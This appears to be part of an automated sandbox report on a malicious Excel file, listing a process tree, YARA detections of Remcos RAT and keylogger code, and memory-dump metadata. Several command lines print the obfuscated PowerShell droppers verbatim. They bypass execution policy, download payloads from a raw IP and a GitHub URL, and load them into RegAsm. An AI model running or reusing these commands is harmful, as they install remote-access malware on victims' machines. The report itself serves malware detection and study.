                                                                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                            Imagebase:0x13fc50000
                                                                                                                                            File size:13'824 bytes
                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:05:56:13
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xa30000
                                                                                                                                            File size:64'704 bytes
                                                                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.849805315.000000000244E000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.849173368.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.850008611.0000000003AC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.848958157.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:18
                                                                                                                                            Start time:05:56:16
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                                                                                                                                            Imagebase:0xa30000
                                                                                                                                            File size:64'704 bytes
                                                                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:19
                                                                                                                                            Start time:05:56:16
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                                                                                                                                            Imagebase:0xa30000
                                                                                                                                            File size:64'704 bytes
                                                                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:20
                                                                                                                                            Start time:05:56:16
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf"
                                                                                                                                            Imagebase:0xa30000
                                                                                                                                            File size:64'704 bytes
                                                                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:21
                                                                                                                                            Start time:05:56:16
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mhhfqkiqxvmvfmtfcdv"
                                                                                                                                            Imagebase:0xa30000
                                                                                                                                            File size:64'704 bytes
                                                                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:22
                                                                                                                                            Start time:05:56:17
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjmxrdtjldezpaqjtnqsed"
                                                                                                                                            Imagebase:0xa30000
                                                                                                                                            File size:64'704 bytes
                                                                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:23
                                                                                                                                            Start time:05:56:17
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                                                                                                                                            Imagebase:0x49f00000
                                                                                                                                            File size:345'088 bytes
                                                                                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:25
                                                                                                                                            Start time:05:56:17
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                                                                                                                                            Imagebase:0x13f0a0000
                                                                                                                                            File size:443'392 bytes
                                                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:26
                                                                                                                                            Start time:05:56:20
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline"
                                                                                                                                            Imagebase:0x13fe50000
                                                                                                                                            File size:2'758'280 bytes
                                                                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:27
                                                                                                                                            Start time:05:56:20
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA28.tmp" "c:\Users\user\AppData\Local\Temp\qjwmez35\CSC8672896636494697B648CFD8C23C5D6C.TMP"
                                                                                                                                            Imagebase:0x13ffe0000
                                                                                                                                            File size:52'744 bytes
                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:29
                                                                                                                                            Start time:05:56:24
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
                                                                                                                                            Imagebase:0xff6d0000
                                                                                                                                            File size:168'960 bytes
                                                                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:30
                                                                                                                                            Start time:05:56:24
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                            Imagebase:0x13f0a0000
                                                                                                                                            File size:443'392 bytes
                                                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:32
                                                                                                                                            Start time:05:56:26
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                                                                                                                                            Imagebase:0x13f0a0000
                                                                                                                                            File size:443'392 bytes
                                                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:33
                                                                                                                                            Start time:05:56:31
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            Imagebase:0xa30000
                                                                                                                                            File size:64'704 bytes
                                                                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.487528799.0000000000931000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                            Has exited:true

                                                                                                                                            Call Graph

                                                                                                                                            • Entrypoint
                                                                                                                                            • Decryption Function
                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            • Show Help
                                                                                                                                            callgraph 1 Error: Graph is empty

                                                                                                                                            Module: Sheet1

                                                                                                                                            Declaration
                                                                                                                                            LineContent
                                                                                                                                            1

                                                                                                                                            Attribute VB_Name = "Sheet1"

                                                                                                                                            2

                                                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                            3

                                                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                                                            4

                                                                                                                                            Attribute VB_Creatable = False

                                                                                                                                            5

                                                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                                                            6

                                                                                                                                            Attribute VB_Exposed = True

                                                                                                                                            7

                                                                                                                                            Attribute VB_TemplateDerived = False

                                                                                                                                            8

                                                                                                                                            Attribute VB_Customizable = True

                                                                                                                                            Module: Sheet2

                                                                                                                                            Declaration
                                                                                                                                            LineContent
                                                                                                                                            1

                                                                                                                                            Attribute VB_Name = "Sheet2"

                                                                                                                                            2

                                                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                            3

                                                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                                                            4

                                                                                                                                            Attribute VB_Creatable = False

                                                                                                                                            5

                                                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                                                            6

                                                                                                                                            Attribute VB_Exposed = True

                                                                                                                                            7

                                                                                                                                            Attribute VB_TemplateDerived = False

                                                                                                                                            8

                                                                                                                                            Attribute VB_Customizable = True

                                                                                                                                            Module: Sheet3

                                                                                                                                            Declaration
                                                                                                                                            LineContent
                                                                                                                                            1

                                                                                                                                            Attribute VB_Name = "Sheet3"

                                                                                                                                            2

                                                                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                            3

                                                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                                                            4

                                                                                                                                            Attribute VB_Creatable = False

                                                                                                                                            5

                                                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                                                            6

                                                                                                                                            Attribute VB_Exposed = True

                                                                                                                                            7

                                                                                                                                            Attribute VB_TemplateDerived = False

                                                                                                                                            8

                                                                                                                                            Attribute VB_Customizable = True

                                                                                                                                            Module: ThisWorkbook

                                                                                                                                            Declaration
                                                                                                                                            LineContent
                                                                                                                                            1

                                                                                                                                            Attribute VB_Name = "ThisWorkbook"

                                                                                                                                            2

                                                                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                            3

                                                                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                                                                            4

                                                                                                                                            Attribute VB_Creatable = False

                                                                                                                                            5

                                                                                                                                            Attribute VB_PredeclaredId = True

                                                                                                                                            6

                                                                                                                                            Attribute VB_Exposed = True

                                                                                                                                            7

                                                                                                                                            Attribute VB_TemplateDerived = False

                                                                                                                                            8

                                                                                                                                            Attribute VB_Customizable = True

                                                                                                                                            Reset < >
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000003.413739628.0000000003370000.00000010.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_3_3370000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                              • Instruction ID: 77aecc3cca552922da9d1f0df9fe9e40ab9e2dd6ccc454cafd5d770df8255a5f
                                                                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000003.413739628.0000000003370000.00000010.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_3_3370000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                              • Instruction ID: 77aecc3cca552922da9d1f0df9fe9e40ab9e2dd6ccc454cafd5d770df8255a5f
                                                                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000003.413739628.0000000003370000.00000010.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_3_3370000_mshta.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                              • Instruction ID: 77aecc3cca552922da9d1f0df9fe9e40ab9e2dd6ccc454cafd5d770df8255a5f
                                                                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                              • Instruction Fuzzy Hash:

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:3.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:4
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 3952 7fe899d7c25 3953 7fe899d7c33 3952->3953 3954 7fe899d7be3 URLDownloadToFileW 3953->3954 3955 7fe899d7c00 3953->3955 3954->3955

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442037308.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe899d0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DownloadFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1407266417-0
                                                                                                                                              • Opcode ID: 9e920fe78f33f4e811570ccdcd6249fedb5f795997c7b412cc14b20087a5accd
                                                                                                                                              • Instruction ID: 5531452c432a854592854753f7e5ccd8de06166eead8e2f0840ecc7c3dab1e54
                                                                                                                                              • Opcode Fuzzy Hash: 9e920fe78f33f4e811570ccdcd6249fedb5f795997c7b412cc14b20087a5accd
                                                                                                                                              • Instruction Fuzzy Hash: FF31B171918A5C8FDB19EF5CD8857A9B7E0FB59311F00822ED04DD3261CB74B8058B81

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.442037308.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_7fe899d0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DownloadFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1407266417-0
                                                                                                                                              • Opcode ID: e9bf2a7a0ff1d59173676c30a39d75dcb183eb9f2beb233881a0df3a09769d3e
                                                                                                                                              • Instruction ID: 2d87ec3c0a72d8d44d0dd28553830fe3f1053cee691a371359325566c5076767
